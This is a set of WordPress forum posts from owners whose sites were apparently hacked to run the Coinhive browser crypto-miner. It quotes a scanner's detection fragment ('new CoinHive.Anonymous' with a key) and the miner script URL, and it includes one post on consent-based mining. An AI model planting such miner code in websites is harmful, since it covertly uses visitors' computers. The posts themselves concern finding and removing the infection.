I’m trying to help a new client, who has come to me with a very slow website. I realised they didn’t have any security (and never have – it’s an old site!) on their site, so have installed wordfence which I use on all my sites.
I’ve done a scan and it says:
This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: new CoinHive.Anonymous(‘TnKJQivLdI92CHM5VDumySeVWinv2yfL’. The infection type is: Browser-based crypto currency miner..
The file is the header.php – I can see the coinhive links/code – but am not sure where from and where to delete it. Or can wordfence help with this? My client is having a new site built by someone else so doesn’t want the pro version at this point in time. But can the free version help?
OR if I paste the code in the header here – can someone let me know which part I can delete?
I’ve already deleted a file wordfence flagged up. I’ve taken backups all the way…
Thanks for any help in advance….
]]>My site has been hacked and Coinhive script has been installed
Anyone know where to find and delete this script.
Thanks
Chris
]]>I have several domains running WordPress. Recently I have noticed a performance deterioration on them. My websites remain down for several minutes every day. There is hardly any visitor on these (not more than a 100/day, since these are mainly personal websites hardly promoted.. ) My Website host keeps on telling me to ” optimize my website ” – which I don’t know how to, since, as my handle suggests, I am newest 
Running a website speed test via :
https://tools.pingdom.com
I notice that domain conhive.com and associated scripts such as https://coinhive.com/lib/coinhive.min.js are frequently being accessed/ run when I run a speedtest on these websites. The net tells me these are for mining some crypto currency via some plugins.
I don’t remember installing any such plugin and am wondering how coinhive got in my sites and is it responsible for deterioration /outages I have been experiencing lately.
Some of my wordpress sites that have this issue are :
https://mytopjob.in/mtjeng
https://getjoy.in
https://strokesupport.in
Any help/advice would be highly appreciated. Thanks !
]]>also see the forum post here
]]>personally, i do not feel this is necessarily a bad thing and, actually, i see this tech in general as potentially excellent way to monetize web content without having to subject visitors to ads or begging for donations
HOWEVER, the way that every single one of the devs are implementing the Coin Hive miner in all of the WP plugs as of this writing is HIGHLY UNETHICAL in my opinion insomuch as they all are allowing the mining script to run WITHOUT even making the visitor aware, much less offering an opt-in solution
Coin Hive seems like they have a solid ethic and a very good privacy policy and and i think they’re in this for the right reasons, one of which is to de-clutter the web of annoying ads and other unethical monetization schemes
here’s some quotes from the Coin Hive blog (The Way Forward), emphasis added…
Our goal was to offer a viable alternative to intrusive and annoying ads that litter so many websites today. These ads are not only a distraction to end users, but also provide notoriously unpredictable and non-transparent revenue numbers. We set out to change that.
[…]
We’re a bit saddened to see that some of our customers integrate Coinhive into their pages without disclosing to their users what’s going on, let alone asking for their permission. We believe there’s so much more potential for our solution, but we have to be respectful to our end users.
[…]
It’s probably too late to do anything about the adblockers that already prevent our current JavaScript from loading. Instead, we will focus on a new implementation that requires an explicit opt-in from the end user to run. We will verify this opt-in on our servers and will implement it in a way that it can not be circumvented. We will pledge to keep the opt-in in tact at all times, without exceptions.
with that said, i would very much like to ask WordPress to please consider disallowing ANY cryptocurrency mining plugin for WP which utilizes the computing power of site visitors without asking the visitors permission, as in opt-in, not opt-out
i see this tech as an excellent opportunity and perhaps a revolutionary change in how content is monetized, but any developer who acts unethically by employing such tech without asking permission first is, i think, a great threat to the future of something that may have enormous potential
already AV companies and ad-block devs are blacklisting these mining scripts because of unethical developers such as those offering the WP plugs i spoke of
]]>also see the forum post here
]]>